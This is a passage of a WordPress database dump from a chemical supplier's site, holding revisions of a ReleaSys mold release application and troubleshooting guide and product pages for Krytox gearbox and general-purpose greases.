105%;"><span style="color: #ff0000;">›</span> Phase-separation of ReleaSys as a result of over agitation or mixing</span></td>\n<td><span style="font-size: 105%;">• Examine ReleaSys; If separation occurred replace with fresh material</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><strong>Poor Release in strained molding areas</strong></td>\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Lack of slip due to mold geometry application angle</td>\n<td>• Apply one or two extra coats of ReleaSys initially; Re-apply touch-up coats to these areas more frequently</td>\n</tr>\n<tr>\n<td style="text-align: center;" width="241"><strong>Good release but build-up of ReleaSys on mold surface.</strong></td>\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust spray gun to dispense lower volume</td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="2" width="241"><strong>Good release but parts exhibit blemishes or oily patches</strong></td>\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust  spray gun to dispense lower volume</td>\n</tr>\n<tr>\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Insufficient cure time</td>\n<td>• Apply lighter coats of ReleaSys and increase cure time allowed and/or increase cure temperature</td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3"><strong>Inability to achieve multiple releases</strong></td>\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\n</tr>\n<tr>\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\n</tr>\n<tr>\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Improper application; non-uniform coverage</td>\n<td>• Clean mold; apply light coats of ReleaSys with 50% overlapp between passes.</td>\n</tr>\n<tr>\n<td style="text-align: center;" width="241"><strong>Poor release and/or small particles of molding material left on mold surface</strong>.</td>\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\n</tr>\n</tbody>\n</table>\n</div>\n&nbsp;\n\n&nbsp;\n\n[ux_product_categories ids="21,16" number="10"]\n<h3>Technical or Application Support:</h3>\n<ul>\n 	<li><strong>To learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></strong></li>\n 	<li><strong>If you require any further technical or application support please contact our technical staff</strong></li>\n 	<li><strong>Mold Release Application Guide</strong></li>\n</ul>\n&nbsp;', 'Mold Release Application Guide - Troubleshooting Guide - ReleaSys™', '', 'inherit', 'closed', 'closed', '', '2694-autosave-v1', '', '', '2017-05-30 12:51:46', '2017-05-30 12:51:46', '', 2694, 'https://www.miller-stephenson.com/2694-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3703, 488, '2017-02-24 13:10:30', '2017-02-24 13:10:30', '', '', '', 'publish', 'closed', 'closed', '', '3703', '', '', '2017-02-24 13:10:30', '2017-02-24 13:10:30', '', 0, 'https://www.miller-stephenson.com/nf_sub/3703/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3704, 2, '2017-02-24 13:38:10', '0000-00-00 00:00:00', '', 'Clearance Items', '', 'draft', 'closed', 'closed', '', '', '', '', '2017-02-24 13:38:10', '2017-02-24 13:38:10', '', 0, 'https://www.miller-stephenson.com/?page_id=3704', 0, 'page', '', 0); 
INSERT INTO `wp_posts` VALUES (3705, 3, '2017-02-24 13:48:03', '2017-02-24 13:48:03', '<h1 data-canvas-width="370.56179999999995"><strong>Mold Release Application Guide -  ReleaSys™ </strong></h1>\r\n<div data-canvas-width="370.56179999999995">Miller-Stephenson has generated a mold release application guide to help aid customers with the proper surface preparation and application of its new semi-permanent release agents. Semi-permanent mold release agents are state of the art release agent systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive<strong> <a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys Semi-Permanent release agents</a></strong> represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul style="text-align: justify;">\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<p style="text-align: justify;">While semi-permanent mold release agents offer superior performance and efficiency, their surface preparation and application technique have greater requirements. Failure to follow the correct method of preparation and application has a more dramatic effect on performance than other conventional release agents. Therefore proper training and guidance is critical to maximize the effectiveness, to this end Miller-Stephenson has generated a comprehensive mold release application guide and Troubleshooting common molding issues guide to help aid our customers in applying ReleaSys.</p>\r\n\r\n<h4><span style="text-decoration: underline; font-size: 115%;"><strong>Surface-Preparation</strong></span></h4>\r\n<p style="text-align: justify;">Semi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agents or contaminates are critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.</p>\r\n\r\n<h4><span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Application to Mold Surface</span></strong></span></h4>\r\n<p style="text-align: justify;">Miller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  Aerosolization minimizes over-application and facilitates the development of a uniform, thin film on the molding surface. Miller-Stephenson offers aerosolized cans of its ReleaSys product line (ie: <strong>ReleaSys <a href="https://www.miller-stephenson.com/product/water-based-ptfe-release-agent/">82</a>, <a href="https://www.miller-stephenson.com/product/rubber-mold-release-agents/">85</a>, <a href="https://www.miller-stephenson.com/product/water-based-mold-release-agent/">88</a>, and <a href="https://www.miller-stephenson.com/product/release-agents/">89</a></strong>) which have been optimized to deliver consistent application and coverage. Our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:</p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set the HVLP gun to appropriate pressure; a typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Nozzle sizes can vary between 0.6 mm to 1.0 mm.  Spray 8-12 inches from the surface with approximately 50% overlap.</li>\r\n 	<li style="text-align: justify;">When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (1-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film or wet coat" and allowed to dry on the surface, failure to do so will dramatically effect performance.\r\n<ul>\r\n 	<li style="text-align: justify;"><em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\r\n</ul>\r\n</li>\r\n</ol>\r\n<h4 style="text-align: justify;"><span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Re-application</span></strong></span></h4>\r\n<ol>\r\n 	<li style="text-align: justify;">When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n 	<li style="text-align: justify;">When molding, it is common for operators to use an HVLP gun to spray the entire mold and apply touch-up coats with the aerosol can.  The aerosol can allows for lighter spray volumes and uniform coverage, particularly in areas that are prone to de-molding issues.</li>\r\n</ol>\r\nFor further assistance please contact our <span style="text-decoration: underline;"><strong><a href="https://www.miller-stephenson.com/tech-support/">Technical Service Department</a></strong></span>. Miller-Stephenson\'s Mold Release Application Guide was designed to set general guidelines for applicators and molders to follow. Each molding operation is different and modifications to the above mentioned process is likely given the diversity and specialization within this field. Please see our Troubleshooting guide below if your are experiencing any issues using our ReleaSys product line.\r\n<h4 style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 130%;"><strong>Troubleshooting Common Molding Issues</strong></span></span></h4>\r\n<table style="height: 634px;" width="1068">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="241"><span style="text-decoration: underline; font-size: 120%;"><strong>Problem</strong></span></td>\r\n<td style="text-align: center;" width="517"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #ff0000;"><strong>Cause</strong></span></span></td>\r\n<td style="text-align: center;" width="680"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #0000ff;"><strong>Solution</strong></span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 105%;"><strong>Complete <span style="background-color: #ffffff;">failure </span>to obtain release</strong></span></td>\r\n<td><span style="color: #ff0000;">›</span><span style="font-size: 105%;">Improperly cured ReleaSys</span></td>\r\n<td><span style="font-size: 105%;">• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 105%;"><span style="color: #ff0000;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</span></td>\r\n<td><span style="font-size: 105%;">• Thoroughly clean mold with bead blasting followed by cleaning with a solvent or high pH detergent.  Reapply ReleaSys.</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 105%;"><span style="color: #ff0000;">›</span> Phase-separation of ReleaSys as a result of over agitation or mixing</span></td>\r\n<td><span style="font-size: 105%;">• Examine ReleaSys; If separation occurred replace with fresh material</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><strong>Poor Release in strained molding areas</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Lack of slip due to mold geometry application angle</td>\r\n<td>• Apply one or two extra coats of ReleaSys initially; Re-apply touch-up coats to these areas more frequently</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Good release but build-up of ReleaSys on mold surface.</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="2" width="241"><strong>Good release but parts exhibit blemishes or oily patches</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust  spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Insufficient cure time</td>\r\n<td>• Apply lighter coats of ReleaSys and increase cure time allowed and/or increase cure temperature</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Inability to achieve multiple releases</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Improper application; non-uniform coverage</td>\r\n<td>• Clean mold; apply light coats of ReleaSys with 50% overlapp between passes.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Poor release and/or small particles of molding material left on mold surface</strong>.</td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><strong>To learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></strong></li>\r\n 	<li><strong>If you require any further technical or application support please contact our technical staff</strong></li>\r\n</ul>\r\n&nbsp;', 'Mold Release Application Guide - Troubleshooting Guide - ReleaSys™', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2017-02-24 13:48:03', '2017-02-24 13:48:03', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3706, 2, '2017-02-24 14:39:25', '2017-02-24 14:39:25', 'Clearance for Krytox GPL 207 20 KG Pail.', 'Krytox GPL 207 20 KG Pail', 'Krytox GPL 207 has a Oil Viscosity of 450 cSt at 40°C.\r\n<br/><br/>\r\nEstimated useful temperature range is -30°C to 288°C.\r\n<br/><br/>\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'closed', 'closed', '', 'krytox-gpl-207-20-kg-pail', '', '', '2017-02-24 14:43:26', '2017-02-24 14:43:26', '', 0, 'https://www.miller-stephenson.com/?post_type=product&#038;p=3706', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (3707, 2, '2017-02-24 14:34:05', '2017-02-24 14:34:05', 'Krytox GPL 207 grease is the product of choice in extreme temperature conditions. Most petroleum products begin to degrade above 99 °C (210 °F) and are too viscous at temperatures just below –18 °C (0 °F). Under the D-3336 test conditions of 177 °C (350 °F) and 10,000 rpm, the majority of competing hydrocarbon lubricants fail in less than 1,000 hr. But, the general purpose line of Krytox lubricants has been shown to last over 5,000 hr without failure, even at an increased temperature of 200 °C (392 °F). This extreme condition performance is what distinguishes Krytox performance lubricants from other competing products.\n\nKrytox GPL 207 grease is cost-effective across a wide range of applications. Due to their inert nature, Krytox lubricants provide a much longer usable life as compared to typical hydrocarbon oils and greases; and the longer usable life allows them to remain for considerable periods of time before needing to be replaced, if they are replaced at all. That translates to savings over time, both by lowering the amount of lubricant purchased and any downtime incurred during re-lubrication.\n\nStandard Krytox lubricants contain only carbon, oxygen, and fluorine; whereas, hydrocarbons contain hydrogen. The absence of hydrogen greatly increases the stability of the lubricants and renders them nonflammable with no flash point. They will not burn or support combustion, even in an environment of 100% liquid or gaseous oxygen.\n\nKrytox performance lubricants are not only resistant to oxygen, but they are also inert to virtually all chemicals used in a variety of industries. They are insoluble in most solvents, but are soluble in highly fluorinated fluids and some super critical fluids, such as CO2.\n\nAt elevated temperatures and pressures, PFPE oils are highly resistant to attack by gaseous and liquid oxygen. As a result, Krytox oils and greases have become preferred lubricants in the oxygen manufacturing industry and in those industries that use oxygen.\n\n<a href="https://www.miller-stephenson.com/krytox-prepare-bearings/">Prepping a bearing for Krytox is a simple process. Click here to get a step by step guide on how to prep a bearing with Krytox grease.</a>\n\n<a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">To learn more about Krytox NSF H-1 Rated Food Grade Lubricants click here.</a>\n\n<a href="https://www.miller-stephenson.com/krytox-automotive-lubricants/">To learn more about Krytox Automotive Solutions click here.</a>\n\n<a href="https://www.miller-stephenson.com/krytox-noise-vibration-harshness/">To learn more about Krytox Automotive Noise, Harshness and Vibration solutions click here. </a>\n\n<a href="https://www.miller-stephenson.com/krytox-faq/">For the Krytox Frequently asked questions (FAQ) click here.</a>\n\n<a href="https://www.miller-stephenson.com/krytox/">For a general Krytox application overview, click here.</a>\n\n<a href="https://www.miller-stephenson.com/krytox-product-selection-guide/">With help regarding which Krytox grease is right for you, click here.</a>', 'GPL 207', 'Krytox GPL 207 has a Oil Viscosity of 450 cSt at 40°C.\n<br/><br/>\nEstimated useful temperature range is -30°C to 288°C.\n<br/><br/>\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '814-autosave-v1', '', '', '2017-02-24 14:34:05', '2017-02-24 14:34:05', '', 814, 'https://www.miller-stephenson.com/814-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3708, 0, '2017-02-24 14:45:13', '2017-02-24 14:45:13', '', '', '', 'publish', 'closed', 'closed', '', '3708', '', '', '2017-02-24 14:45:13', '2017-02-24 14:45:13', '', 0, 'https://www.miller-stephenson.com/nf_sub/3708/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3709, 490, '2017-02-24 15:29:17', '2017-02-24 15:29:17', '', '', '', 'publish', 'closed', 'closed', '', '3709', '', '', '2017-02-24 15:29:18', '2017-02-24 15:29:18', '', 0, 'https://www.miller-stephenson.com/nf_sub/3709/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3710, 2, '2017-02-24 18:50:12', '2017-02-24 18:50:12', '<h3>Krytox GB M0 | Sootblower | Gearbox Grease | Premium Performance Gearbox Greases</h3>\r\nPerformance Lubricants has developed a series of greases specifically designed to lubricate and protect high temperature gearbox gears, bearings, and seals. Krytox™ fluoropolymer greases provide excellent lubrication and will not oxidize in the most demanding high temperature environments, even in applications with operating temperatures up to approximately 270 °C (518 °F). Use of Krytox™ gearbox grease will help eliminate bearing and gear failures resulting from lubricant oxidation, lead to longer seal life, and extend gearbox life. In many applications, Krytox GB M0 gearbox grease will last the life of the gearbox, greatly reducing\r\nor eliminating the need for maintenance and re-lubrication. When compared to oil-lubricated systems, use of Krytox™ grease can also significantly help reduce lubricant leakage related to seal failure.\r\n\r\nKrytox™ gearbox greases are available in various base oil viscosities to provide the best performance for your given environment. There are currently two grades of premium performance gearbox grease, Krytox™ GB M0 and GB H0, which are semi-fluid lubricants specifically designed for enclosed gearbox lubrication. As many gearbox designs utilize bearings that are not lubricated by the internal lubricant reservoir and require periodic re-lubrication (and this grease is often forced past the bearing seals into the reservoir), Krytox™ GB A2 and C2 have been added to the line to limit cross-contamination of the internal grease with a non-compatible bearing grease.\r\n\r\nPlease consult with Krytox™ <a href="https://www.miller-stephenson.com/tech-support/">Technical Service</a> to determine if one of these grades is right for your application or if an additional grade is required.\r\n\r\nKrytox™ greases are made from clear, colorless fluorinated, synthetic oils that are non-reactive, non-flammable, safe in harsh environments, long lasting, and compatible with all seal materials. Krytox™ is a perfluoropolyether-based polymer composed of fluorine, oxygen, and carbon. No hydrogen is present in the molecule, resulting in exceptional stability and non-flammability.', 'Krytox GB M0', 'Krytox™ gearbox greases are available in various base oil viscosities to provide the best performance for your given environment.\r\n<br/><br/>\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'closed', 'closed', '', 'krytox-gb-m0', '', '', '2017-02-24 18:50:57', '2017-02-24 18:50:57', '', 0, 'https://www.miller-stephenson.com/?post_type=product&#038;p=3710', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (3711, 2, '2017-02-24 18:48:46', '2017-02-24 18:48:46', '', 'Krytox gb m0', 'Sootblower gearbox grease', 'inherit', 'closed', 'closed', '', 'sootblower-gb-m0', '', '', '2017-02-24 18:49:18', '2017-02-24 18:49:18', '', 3710, 'https://www.miller-stephenson.com/wp-content/uploads/2017/02/Sootblower-GB-M0.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3712, 2, '2017-02-24 18:58:15', '2017-02-24 18:58:15', '', 'sootblower-gearbox-grease', '', 'inherit', 'closed', 'closed', '', 'sootblower-gearbox-grease', '', '', '2017-02-24 18:58:15', '2017-02-24 18:58:15', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2017/02/Sootblower-Gearbox-Grease.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3713, 492, '2017-02-24 19:03:46', '2017-02-24 19:03:46', '', '', '', 'publish', 'closed', 'closed', '', '3713', '', '', '2017-02-24 19:03:47', '2017-02-24 19:03:47', '', 0, 'https://www.miller-stephenson.com/nf_sub/3713/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3714, 2, '2017-02-24 19:10:51', '2017-02-24 19:10:51', '', 'Krytox Fluoroguard', '', 'inherit', 'closed', 'closed', '', 'shutterstock_503819962', '', '', '2017-02-24 19:11:05', '2017-02-24 19:11:05', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_503819962.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3715, 2, '2017-02-24 19:14:29', '2017-02-24 19:14:29', '', 'Corrugator Grease', '', 'inherit', 'closed', 'closed', '', 'shutterstock_491242234', '', '', '2017-02-24 19:14:45', '2017-02-24 19:14:45', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_491242234.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3716, 2, '2017-02-24 19:19:45', '2017-02-24 19:19:45', '', 'Gearbox Grease', '', 'inherit', 'closed', 'closed', '', 'shutterstock_245717290', '', '', '2017-02-24 19:20:00', '2017-02-24 19:20:00', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_245717290.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3717, 2, '2017-02-24 19:21:16', '2017-02-24 19:21:16', '', 'Krytox TM7', '', 'inherit', 'closed', 'closed', '', 'shutterstock_391175785', '', '', '2017-02-24 19:21:31', '2017-02-24 19:21:31', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_391175785.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3718, 2, '2017-02-24 19:22:50', '2017-02-24 19:22:50', '', 'Functional Polymers', '', 'inherit', 'closed', 'closed', '', 'shutterstock_71187163', '', '', '2017-02-24 19:23:04', '2017-02-24 19:23:04', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_71187163.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3719, 2, '2017-02-24 19:28:32', '2017-02-24 19:28:32', '<h3>Krytox GB H0 | Sootblower | Gearbox Grease | Premium Performance Gearbox Greases</h3>\r\nPerformance Lubricants has developed a series of greases specifically designed to lubricate and protect high temperature gearbox gears, bearings, and seals. Krytox™ fluoropolymer greases provide excellent lubrication and will not oxidize in the most demanding high temperature environments, even in applications with operating temperatures up to approximately 270 °C (518 °F). Use of Krytox™ gearbox grease will help eliminate bearing and gear failures resulting from lubricant oxidation, lead to longer seal life, and extend gearbox life. In many applications, Krytox GB H0 gearbox grease will last the life of the gearbox, greatly reducing\r\nor eliminating the need for maintenance and re-lubrication. When compared to oil-lubricated systems, use of Krytox™ grease can also significantly help reduce lubricant leakage related to seal failure.\r\n\r\nKrytox™ gearbox greases are available in various base oil viscosities to provide the best performance for your given environment. There are currently two grades of premium performance gearbox grease, Krytox™ GB M0 and GB H0, which are semi-fluid lubricants specifically designed for enclosed gearbox lubrication. As many gearbox designs utilize bearings that are not lubricated by the internal lubricant reservoir and require periodic re-lubrication (and this grease is often forced past the bearing seals into the reservoir), Krytox™ GB A2 and C2 have been added to the line to limit cross-contamination of the internal grease with a non-compatible bearing grease.\r\n\r\nPlease consult with Krytox™ <a href="https://www.miller-stephenson.com/tech-support/">Technical Service</a> to determine if one of these grades is right for your application or if an additional grade is required.\r\n\r\nKrytox™ greases are made from clear, colorless fluorinated, synthetic oils that are non-reactive, non-flammable, safe in harsh environments, long lasting, and compatible with all seal materials. Krytox™ is a perfluoropolyether-based polymer composed of fluorine, oxygen, and carbon. No hydrogen is present in the molecule, resulting in exceptional stability and non-flammability.', 'Krytox GB H0', 'Krytox™ gearbox greases are available in various base oil viscosities to provide the best performance for your given environment.\r\n<br/><br/>\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'closed', 'closed', '', 'krytox-gb-h0', '', '', '2017-02-24 19:37:07', '2017-02-24 19:37:07', '', 0, 'https://www.miller-stephenson.com/product/krytox-gb-h0/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (3720, 2, '2017-02-24 19:35:06', '2017-02-24 19:35:06', '<h3>Krytox GB H0 | Sootblower | Gearbox Grease | Premium Performance Gearbox Greases</h3>\nPerformance Lubricants has developed a series of greases specifically designed to lubricate and protect high temperature gearbox gears, bearings, and seals. Krytox™ fluoropolymer greases provide excellent lubrication and will not oxidize in the most demanding high temperature environments, even in applications with operating temperatures up to approximately 270 °C (518 °F). Use of Krytox™ gearbox grease will help eliminate bearing and gear failures resulting from lubricant oxidation, lead to longer seal life, and extend gearbox life. In many applications, Krytox GB H0 gearbox grease will last the life of the gearbox, greatly reducing\nor eliminating the need for maintenance and re-lubrication. When compared to oil-lubricated systems, use of Krytox™ grease can also significantly help reduce lubricant leakage related to seal failure.\n\nKrytox™ gearbox greases are available in various base oil viscosities to provide the best performance for your given environment. There are currently two grades of premium performance gearbox grease, Krytox™ GB M0 and GB H0, which are semi-fluid lubricants specifically designed for enclosed gearbox lubrication. As many gearbox designs utilize bearings that are not lubricated by the internal lubricant reservoir and require periodic re-lubrication (and this grease is often forced past the bearing seals into the reservoir), Krytox™ GB A2 and C2 have been added to the line to limit cross-contamination of the internal grease with a non-compatible bearing grease.\n\nPlease consult with Krytox™ <a href="https://www.miller-stephenson.com/tech-support/">Technical Service</a> to determine if one of these grades is right for your application or if an additional grade is required.\n\nKrytox™ greases are made from clear, colorless fluorinated, synthetic oils that are non-reactive, non-flammable, safe in harsh environments, long lasting, and compatible with all seal materials. Krytox™ is a perfluoropolyether-based polymer composed of fluorine, oxygen, and carbon. No hydrogen is present in the molecule, resulting in exceptional stability and non-flammability.', 'Krytox GB H0', 'Krytox™ gearbox greases are available in various base oil viscosities to provide the best performance for your given environment.\n\n\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '3719-autosave-v1', '', '', '2017-02-24 19:35:06', '2017-02-24 19:35:06', '', 3719, 'https://www.miller-stephenson.com/3719-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3721, 2, '2017-02-24 19:34:31', '2017-02-24 19:34:31', '', 'Krytox GB A2', '', 'inherit', 'closed', 'closed', '', 'shutterstock_322483565', '', '', '2017-02-24 19:39:12', '2017-02-24 19:39:12', '', 3719, 'https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_322483565.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3722, 2, '2017-02-24 19:38:20', '2017-02-24 19:38:20', '<h3>Krytox GB A2 | Sootblower | Gearbox Grease | Premium Performance Gearbox Greases</h3>\r\nPerformance Lubricants has developed a series of greases specifically designed to lubricate and protect high temperature gearbox gears, bearings, and seals. Krytox™ fluoropolymer greases provide excellent lubrication and will not oxidize in the most demanding high temperature environments, even in applications with operating temperatures up to approximately 270 °C (518 °F). Use of Krytox™ gearbox grease will help eliminate bearing and gear failures resulting from lubricant oxidation, lead to longer seal life, and extend gearbox life. In many applications, Krytox GB A2 gearbox grease will last the life of the gearbox, greatly reducing\r\nor eliminating the need for maintenance and re-lubrication. When compared to oil-lubricated systems, use of Krytox™ grease can also significantly help reduce lubricant leakage related to seal failure.\r\n\r\nKrytox™ gearbox greases are available in various base oil viscosities to provide the best performance for your given environment. There are currently two grades of premium performance gearbox grease, Krytox™ GB M0 and GB H0, which are semi-fluid lubricants specifically designed for enclosed gearbox lubrication. As many gearbox designs utilize bearings that are not lubricated by the internal lubricant reservoir and require periodic re-lubrication (and this grease is often forced past the bearing seals into the reservoir), Krytox™ GB A2 and C2 have been added to the line to limit cross-contamination of the internal grease with a non-compatible bearing grease.\r\n\r\nPlease consult with Krytox™ <a 